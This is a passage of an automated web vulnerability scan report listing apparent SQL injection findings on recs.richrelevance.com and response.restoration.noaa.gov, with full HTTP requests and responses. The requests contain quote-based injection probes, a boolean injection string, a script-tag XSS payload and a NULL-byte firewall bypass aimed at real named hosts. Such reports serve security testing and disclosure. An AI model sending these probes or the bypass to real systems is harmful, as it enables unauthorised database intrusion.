if (document.cookie.match(/hm=/)) {
pageTracker._setVar('authenticated');
}
pageTracker._setAllowHash(false);
pageTracker._trackPageview();
</script>

<!-- v=2,utz=x,ssl=0,ua=Win-MSIE-7,uid=0,sn=16886,pid=8023,hn=sf70,nw=0,w=webappsec,pv=pub,pkg=p5,perm=none,crea=1236791014,mt=1298335040,sc=1554,cl=1,cat=edu,mpu=6,NQsid=1,Nmc=252,Ncd=0.0015,Nkb=26,Nct=0.0635,Ncl=1298680821.1519,Nwc=1,Nwt=1298680821.1731,sid=13246901,te=0.127 -->

1.83. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /rrserver'/p13n_generated.js?a=5387d7af823640a7&ts=1298696012699&pte=t&cn=women&c=70656&pt=%7Ccategory_page&s=610713bc749cf4d34b532d430bfb19afaxMnVNoVzaGoxMnVNoVzaGW200BDDB78D40746D2B91C5B5BCF5317AD0AE1105704&pref=http%3A%2F%2Fwww.jcpenney.com%2Fjcp%2Fdefault.aspx&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://www2.jcpenney.com/jcp/x2.aspx?DeptID=70656&CatID=70656&cmAMS_T=G1&cmAMS_C=D1B&mscssid=6781f8d69adfb4b56a7c960f89a4dcae2xMnVNoV5a3oxMnVNoV5a3W200B58E3AFFEDC3F853B83DAF37AF65E61271105704&cmAMS_V=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=8f0d715c-e29a-4f38-9373-184b98130248

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.8.44
Date: Sat, 26 Feb 2011 04:54:36 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 1036

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /rrserver''/p13n_generated.js?a=5387d7af823640a7&ts=1298696012699&pte=t&cn=women&c=70656&pt=%7Ccategory_page&s=610713bc749cf4d34b532d430bfb19afaxMnVNoVzaGoxMnVNoVzaGW200BDDB78D40746D2B91C5B5BCF5317AD0AE1105704&pref=http%3A%2F%2Fwww.jcpenney.com%2Fjcp%2Fdefault.aspx&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://www2.jcpenney.com/jcp/x2.aspx?DeptID=70656&CatID=70656&cmAMS_T=G1&cmAMS_C=D1B&mscssid=6781f8d69adfb4b56a7c960f89a4dcae2xMnVNoV5a3oxMnVNoV5a3W200B58E3AFFEDC3F853B83DAF37AF65E61271105704&cmAMS_V=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=8f0d715c-e29a-4f38-9373-184b98130248

Response 2

HTTP/1.1 400 Bad Request
Server: nginx/0.8.44
Date: Sat, 26 Feb 2011 04:54:36 GMT
Connection: keep-alive
Content-Length: 0


1.84. http://response.restoration.noaa.gov/deepwaterhorizon/factsheets [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /deepwaterhorizon/factsheets

Issue detail

The %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /deepwaterhorizon/factsheets?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E' HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7bf40be4e7088c5b50a95bc456b809b0

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 13:46:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1292

<br />
<b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>/mnt/disk3/sync/cluster/response.restoration.noaa.gov/publish/http/404.php</b> on line <b>27</b>
...[SNIP]...

Request 2

GET /deepwaterhorizon/factsheets?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E'' HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7bf40be4e7088c5b50a95bc456b809b0

Response 2

HTTP/1.1 302 Found
Date: Sat, 26 Feb 2011 13:46:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Location: http://response.restoration.noaa.gov/orr_search.php?message=The page you requested was not found. Please use our search page to find what you were looking for.
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 590

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...

1.85. http://response.restoration.noaa.gov/deepwaterhorizon/factsheets [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /deepwaterhorizon/factsheets

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /deepwaterhorizon'/factsheets HTTP/1.1
Host: response.restoration.noaa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:06:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 1218
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>/mnt/disk3/sync/cluster/response.restoration.noaa.gov/publish/http/404.php</b> on line <b>27</b>
...[SNIP]...

Request 2

GET /deepwaterhorizon''/factsheets HTTP/1.1
Host: response.restoration.noaa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 26 Feb 2011 02:06:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Location: http://response.restoration.noaa.gov/orr_search.php?message=The page you requested was not found. Please use our search page to find what you were looking for.
Vary: Accept-Encoding
Content-Length: 516
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...

1.86. http://response.restoration.noaa.gov/deepwaterhorizon/factsheets [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /deepwaterhorizon/factsheets

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /deepwaterhorizon/factsheets' HTTP/1.1
Host: response.restoration.noaa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:06:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 1218
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>/mnt/disk3/sync/cluster/response.restoration.noaa.gov/publish/http/404.php</b> on line <b>27</b>
...[SNIP]...

Request 2

GET /deepwaterhorizon/factsheets'' HTTP/1.1
Host: response.restoration.noaa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 26 Feb 2011 02:06:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Location: http://response.restoration.noaa.gov/orr_search.php?message=The page you requested was not found. Please use our search page to find what you were looking for.
Vary: Accept-Encoding
Content-Length: 516
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...

1.87. http://response.restoration.noaa.gov/deepwaterhorizon/factsheets [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /deepwaterhorizon/factsheets

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /deepwaterhorizon/factsheets?1'=1 HTTP/1.1
Host: response.restoration.noaa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:06:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 1222
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>/mnt/disk3/sync/cluster/response.restoration.noaa.gov/publish/http/404.php</b> on line <b>27</b>
...[SNIP]...

Request 2

GET /deepwaterhorizon/factsheets?1''=1 HTTP/1.1
Host: response.restoration.noaa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 26 Feb 2011 02:06:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Location: http://response.restoration.noaa.gov/orr_search.php?message=The page you requested was not found. Please use our search page to find what you were looking for.
Vary: Accept-Encoding
Content-Length: 520
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...

1.88. http://response.restoration.noaa.gov/deepwaterhorizon/noaaroles [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /deepwaterhorizon/noaaroles

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /deepwaterhorizon'/noaaroles HTTP/1.1
Host: response.restoration.noaa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:06:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 1217
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>/mnt/disk3/sync/cluster/response.restoration.noaa.gov/publish/http/404.php</b> on line <b>27</b>
...[SNIP]...

Request 2

GET /deepwaterhorizon''/noaaroles HTTP/1.1
Host: response.restoration.noaa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 26 Feb 2011 02:06:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Location: http://response.restoration.noaa.gov/orr_search.php?message=The page you requested was not found. Please use our search page to find what you were looking for.
Vary: Accept-Encoding
Content-Length: 515
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...

1.89. http://response.restoration.noaa.gov/deepwaterhorizon/noaaroles [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /deepwaterhorizon/noaaroles

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /deepwaterhorizon/noaaroles' HTTP/1.1
Host: response.restoration.noaa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:06:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 1217
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>/mnt/disk3/sync/cluster/response.restoration.noaa.gov/publish/http/404.php</b> on line <b>27</b>
...[SNIP]...

Request 2

GET /deepwaterhorizon/noaaroles'' HTTP/1.1
Host: response.restoration.noaa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 26 Feb 2011 02:06:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Location: http://response.restoration.noaa.gov/orr_search.php?message=The page you requested was not found. Please use our search page to find what you were looking for.
Vary: Accept-Encoding
Content-Length: 515
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...

1.90. http://response.restoration.noaa.gov/deepwaterhorizon/noaaroles [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /deepwaterhorizon/noaaroles

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /deepwaterhorizon/noaaroles?1'=1 HTTP/1.1
Host: response.restoration.noaa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:06:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 1221
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>/mnt/disk3/sync/cluster/response.restoration.noaa.gov/publish/http/404.php</b> on line <b>27</b>
...[SNIP]...

Request 2

GET /deepwaterhorizon/noaaroles?1''=1 HTTP/1.1
Host: response.restoration.noaa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sat, 26 Feb 2011 02:06:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Location: http://response.restoration.noaa.gov/orr_search.php?message=The page you requested was not found. Please use our search page to find what you were looking for.
Vary: Accept-Encoding
Content-Length: 519
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...

1.91. http://response.restoration.noaa.gov/dwh.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /dwh.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /dwh.php'?entry_id=812 HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:24:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1211

<br />
<b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>/mnt/disk3/sync/cluster/response.restoration.noaa.gov/publish/http/404.php</b> on line <b>27</b>
...[SNIP]...

Request 2

GET /dwh.php''?entry_id=812 HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Found
Date: Sat, 26 Feb 2011 02:24:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Location: http://response.restoration.noaa.gov/orr_search.php?message=The page you requested was not found. Please use our search page to find what you were looking for.
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 509

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...

1.92. http://response.restoration.noaa.gov/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico' HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:23:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1202

<br />
<b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>/mnt/disk3/sync/cluster/response.restoration.noaa.gov/publish/http/404.php</b> on line <b>27</b>
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Found
Date: Sat, 26 Feb 2011 02:23:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Location: http://response.restoration.noaa.gov/orr_search.php?message=The page you requested was not found. Please use our search page to find what you were looking for.
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 500

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...

1.93. http://response.restoration.noaa.gov/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /index.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php' HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Referer: http://response.restoration.noaa.gov/dwh.php?entry_id=-1+OR+17-7%3d10
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7bf40be4e7088c5b50a95bc456b809b0

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:41:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1200

<br />
<b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>/mnt/disk3/sync/cluster/response.restoration.noaa.gov/publish/http/404.php</b> on line <b>27</b>
...[SNIP]...

Request 2

GET /index.php'' HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Referer: http://response.restoration.noaa.gov/dwh.php?entry_id=-1+OR+17-7%3d10
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7bf40be4e7088c5b50a95bc456b809b0

Response 2

HTTP/1.1 302 Found
Date: Sat, 26 Feb 2011 02:41:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Location: http://response.restoration.noaa.gov/orr_search.php?message=The page you requested was not found. Please use our search page to find what you were looking for.
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1
...[SNIP]...

1.94. http://response.restoration.noaa.gov/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /index.php/1%00' HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Referer: http://response.restoration.noaa.gov/dwh.php?entry_id=-1+OR+17-7%3d10
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7bf40be4e7088c5b50a95bc456b809b0

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:41:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1205

<br />
<b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>/mnt/disk3/sync/cluster/response.restoration.noaa.gov/publish/http/404.php</b> on line <b>27</b>
...[SNIP]...

Request 2

GET /index.php/1%00'' HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Referer: http://response.restoration.noaa.gov/dwh.php?entry_id=-1+OR+17-7%3d10
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
